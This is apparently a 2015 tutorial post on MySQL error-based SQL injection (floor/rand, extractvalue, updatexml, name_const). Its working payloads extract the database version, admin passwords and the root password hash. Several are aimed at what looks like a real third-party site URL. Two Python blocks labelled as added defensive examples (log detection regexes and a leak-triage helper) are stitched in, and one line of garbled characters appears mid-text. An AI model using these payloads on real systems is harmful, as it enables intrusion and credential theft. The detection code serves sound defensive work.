MySQL error-based injection: the three error modes (floor, ExtractValue, UpdateXml) and how they are used

Posted on 2015-11-11 19:03:37

1. Triggering an error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed inside the error message. To retrieve other data, replace the version() expression with another subquery.
For example, to retrieve the admin username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Additional collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
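As an added defender-side example (not part of the post or of any tool it mentions), the Python below URL-decodes the request target of web-server access-log lines and labels those carrying the four error-based families collected above: the floor()/rand() group-by trick, extractvalue(), updatexml() and the name_const() self-join. The log lines are constructed and the /article.php path is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four MySQL error-based families shown in the post.
SIGNATURES = [
    ("floor_groupby", re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I)),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("updatexml", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("name_const", re.compile(r"\bname_const\s*\(", re.I)),
]

# Minimal combined-log parser: only the request target and the status code are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify_request(target):
    """Return the error-based families whose signature appears in the decoded request target."""
    decoded = unquote_plus(target)                 # '+' and %xx as the query parser sees them
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # MySQL treats /* */ comments as whitespace
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines):
    """Return (target, families, status) for every log line carrying a known signature."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m is None:
            continue
        families = classify_request(m.group("target"))
        if families:
            hits.append((m.group("target"), families, int(m.group("status"))))
    return hits


# Constructed sample log lines (not from the original post): two carry payloads in the
# shape shown above against an assumed /article.php endpoint, the third is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 512',
    '10.0.0.5 - - [11/Nov/2015:19:03:38 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 480',
    '10.0.0.7 - - [11/Nov/2015:19:04:01 +0800] "GET /article.php?id=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for target, families, status in scan_log(SAMPLE_LOG):
        print(status, families, target[:60])
```

A 500 status paired with one of these families is the combination worth alerting on, since the technique only works when the database error reaches the client.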

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...
8 I. {. w- U$ L# R: i; f2 l! @2 |
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
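After an incident the question for a responder is what these error messages actually disclosed. As an added example (not from the post), this Python triage helper reads (url, body) pairs from a proxy or WAF capture, matches the three MySQL error texts quoted in the post (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name) and recovers the leaked value from each; the sample responses are constructed and the password hash is a placeholder.

```python
import re

# The MySQL error texts quoted in the post, each with a capture group for the value
# that was smuggled into the error (the data the injection exfiltrates).
LEAK_PATTERNS = {
    # floor()/rand() group-by: ERROR 1062 Duplicate entry '<data><0|1>' for key 'group_key'
    "duplicate_entry": re.compile(r"Duplicate entry '(?P<leak>[^']*)' for key '(?P<key>[^']+)'"),
    # extractvalue()/updatexml(): ERROR 1105 XPATH syntax error: '<separator><data>'
    "xpath_error": re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'"),
    # name_const() self-join: Duplicate column name '<data>'
    "duplicate_column": re.compile(r"Duplicate column name '(?P<leak>[^']*)'"),
}


def extract_leak(body):
    """Return (kind, disclosed_value) if the response body carries one of the error
    texts above, else None. The trailing 0/1 that floor(rand(0)*2) appends and the
    0x5c / 0x3a prefix used to force the XPATH error are stripped, so the caller
    sees exactly what was disclosed."""
    for kind, rx in LEAK_PATTERNS.items():
        m = rx.search(body)
        if m is None:
            continue
        leak = m.group("leak")
        if kind == "duplicate_entry" and m.group("key") == "group_key":
            leak = leak[:-1]            # drop the 0/1 appended by floor(rand(0)*2)
        elif kind == "xpath_error":
            leak = leak.lstrip("\\:")   # drop the 0x5c / 0x3a separator prefix
        return kind, leak
    return None


def triage(responses):
    """Given (url, body) pairs from a proxy or WAF capture, list the ones that disclosed data."""
    report = []
    for url, body in responses:
        found = extract_leak(body)
        if found is not None:
            report.append({"url": url, "kind": found[0], "leaked": found[1]})
    return report


# Constructed sample responses (not captured from any real site); the error strings are
# shaped like the ones quoted in the post, with a placeholder in place of a real hash.
SAMPLES = [
    ("/article.php?id=1", "<html><h1>test</h1><p>do it</p></html>"),
    ("/article.php?id=1+and+(select...)", "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"),
    ("/article.php?id=1+and+extractvalue(...)", "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'"),
    ("/detail.php?id=330+and+1=(select...)", "Error: Duplicate column name 'root ~ *PLACEHOLDER_HASH'"),
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```

Any hit here means raw database errors are reaching clients; the fix is to log them server-side and return a generic error page, on top of parameterising the query.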